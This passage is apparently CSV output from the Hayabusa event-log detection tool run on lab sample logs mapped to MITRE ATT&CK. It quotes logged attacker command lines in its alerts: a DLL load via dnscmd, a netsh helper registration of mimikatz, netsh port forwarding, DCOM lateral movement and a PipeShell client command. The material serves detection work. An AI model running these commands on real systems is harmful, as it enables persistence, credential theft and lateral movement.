""C:\TOOLS\Mimikatz-fev-2020\mimilib.dll"" | Path: C:\Windows\System32\dnscmd.exe | PID: 0x1498 | User: admmig | LID: 0x907c7c09",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx +2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,../hayabusa-rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx +2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx +2021-05-19 06:30:17.318 +09:00,rootdc1.offsec.lan,4688,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID4688-DNS DLL serverlevelplugindll command.evtx +2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,Evas,DNS Server Error Failed Loading the ServerLevelPluginDLL,,../hayabusa-rules/sigma/builtin/dns_server/win_susp_dns_config.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx +2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,Exec,Possible CVE-2021-1675 Print Spooler Exploitation,,../hayabusa-rules/sigma/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx 
+2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx +2021-05-19 06:33:49.548 +09:00,rootdc1.offsec.lan,770,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID770-Success DLL loaded by DNS server.evtx +2021-05-20 21:49:31.863 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 21:49:46.875 +09:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: FS01$ | Target User: sshd_5848 | IP Address: - | Process: C:\Program Files\OpenSSH-Win64\sshd.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4624,low,,Logon Type 5 - Service,User: sshd_5848 | Computer: - | IP Addr: - | LID: 0x3c569ed,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 21:49:46.876 +09:00,fs01.offsec.lan,4672,info,,Admin Logon,User: sshd_5848 | LID: 0x3c569ed,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential 
Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 21:49:52.315 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 21:49:53.378 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with 
non existing users.evtx +2021-05-20 21:49:54.043 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 21:49:54.662 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4776,info,,NTLM Logon To Local Account,User: NOUSER | Computer: FS01 | Status: 0xc0000064,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx +2021-05-20 21:49:54.945 +09:00,fs01.offsec.lan,4625,info,,Logon Failure - User Does Not Exist,User: NOUSER | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with non existing users.evtx 
+2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: FS01$ | Target User: sshd_4332 | IP Address: - | Process: C:\Program Files\OpenSSH-Win64\sshd.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx +2021-05-22 05:43:07.153 +09:00,fs01.offsec.lan,4624,low,,Logon Type 5 - Service,User: sshd_4332 | Computer: - | IP Addr: - | LID: 0x47a203c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx +2021-05-22 05:43:18.227 +09:00,fs01.offsec.lan,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: FS01$ | Target User: admmig | IP Address: - | Process: C:\Program Files\OpenSSH-Win64\sshd.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx +2021-05-22 05:43:22.562 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx +2021-05-22 05:43:49.345 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut 
force/ID4625-OpenSSH brutforce with valid users.evtx +2021-05-22 05:43:50.131 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx +2021-05-22 05:43:50.607 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx +2021-05-22 05:43:50.866 +09:00,fs01.offsec.lan,4625,low,,Logon Failure - Wrong Password,User: admmig@offsec.lan | Type: 8 | Computer: FS01 | IP Addr: - | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4625-OpenSSH brutforce with valid users.evtx +2021-05-23 06:56:57.685 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx +2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh add helper mimikatz.exe | Path: C:\Windows\System32\netsh.exe | PID: 0xd28 | User: admmig | LID: 0x75494,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx 
+2021-05-23 06:57:11.842 +09:00,fs01.offsec.lan,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID4688-netsh helper DLL.evtx +2021-05-26 22:02:27.149 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x312517c1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:27.149 +09:00,mssql01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,critical,Exec,CVE-2021-1675 Print Spooler Exploitation IPC Access,,../hayabusa-rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:27.155 +09:00,mssql01.offsec.lan,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:29.726 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x31251a6a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 
22:02:29.726 +09:00,mssql01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:29.734 +09:00,mssql01.offsec.lan,5145,critical,Exec,CVE-2021-1675 Print Spooler Exploitation IPC Access,,../hayabusa-rules/sigma/builtin/security/win_exploit_cve_2021_1675_printspooler_security.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:34.373 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251ce4,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:34.375 +09:00,mssql01.offsec.lan,5145,medium,LatMov,DCERPC SMB Spoolss Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:34.379 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251d11,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 
22:02:34.379 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251d23,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-26 22:02:34.380 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x31251d36,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1557-Man in the middle/ID5145-Print spooler bug abuse.evtx +2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,medium,CredAccess,Possible AS-REP Roasting,Possible AS-REP Roasting,../hayabusa-rules/hayabusa/default/alerts/Security/4768_KerberosTGT-Request_AS-REP-Roasting.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx +2021-05-27 05:24:46.570 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admin-test | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0 | PreAuthType: 0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-Kerberos AS-REP Roasting.evtx +2021-05-28 04:30:47.965 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx" +2021-05-28 04:30:47.966 
+09:00,jump01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID(""MMC20.Application.1"",""fs01""))",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx" +2021-05-28 04:30:47.966 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,"$a = [System.Activator]::CreateInstance([type]::GetTypeFromProgID(""MMC20.Application.1"",""fs01""))",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx" +2021-05-28 04:30:48.169 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx" +2021-05-28 04:30:48.170 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx" +2021-05-28 04:30:48.172 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; 
value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4103,4104-DCOMexec native via PowerShell.evtx" +2021-06-01 23:06:34.542 +09:00,fs01.offsec.lan,4720,low,Persis,Local User Account Created,User: WADGUtilityAccount | SID: S-1-5-21-1081258321-37805170-3511562335-1000,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx" +2021-06-01 23:08:21.225 +09:00,fs01.offsec.lan,4720,low,Persis,Local User Account Created,User: elie | SID: S-1-5-21-1081258321-37805170-3511562335-1001,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx" +2021-06-01 23:09:38.437 +09:00,fs01.offsec.lan,4698,info,,Task Created,"Name: \Microsoft\SynchronizeTimeZone | Content: 2021-06-01T16:09:38.3707854 OFFSEC\admmig \Microsoft\SynchronizeTimeZone 2021-06-01T16:09:35.8747701 true 1 LeastPrivilege OFFSEC\admmig InteractiveToken IgnoreNew true true true false false PT10M PT1H true false true true false false false P3D 7 adf | User: admmig | LID: 0x46b7b4",../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4720,4698-Fortinet APT group abuse on Windows.evtx" +2021-06-03 21:17:56.988 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding 
abuse.evtx +2021-06-03 21:17:58.582 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh I p a v l=8001 listena=0.0.0.0 connectp=3389 c=1.1.1.1 | Path: C:\Windows\System32\netsh.exe | PID: 0x578 | User: admmig | LID: 0x46b7b4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx +2021-06-03 21:18:04.312 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=48333 connectaddress=127.0.0.1 connectport=80 | Path: C:\Windows\System32\netsh.exe | PID: 0x1048 | User: admmig | LID: 0x46b7b4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx +2021-06-03 21:18:06.940 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh interface portproxy reset | Path: C:\Windows\System32\netsh.exe | PID: 0x46c | User: admmig | LID: 0x46b7b4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx +2021-06-03 21:18:12.941 +09:00,fs01.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x322e5b7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx +2021-06-03 21:18:12.942 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 
0x322e5b7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0011-Command and Control/T1572-Protocol tunneling/ID4688-netsh RDP port forwarding abuse.evtx +2021-06-03 22:05:20.242 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 22:05:40.097 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 22:05:40.098 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 22:05:59.812 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 22:06:06.124 
+09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 22:06:06.125 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,Invoke-PipeShell -mode client -server localhost -aeskey aaaabbbbccccdddd -pipe eventlog_svc -i -timeout 1000,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 22:06:06.151 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.IO.Pipes.NamedPipeClientStream"" ParameterBinding(New-Object): name=""ArgumentList""; value=""localhost, eventlog_svc, InOut, None, Impersonation""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 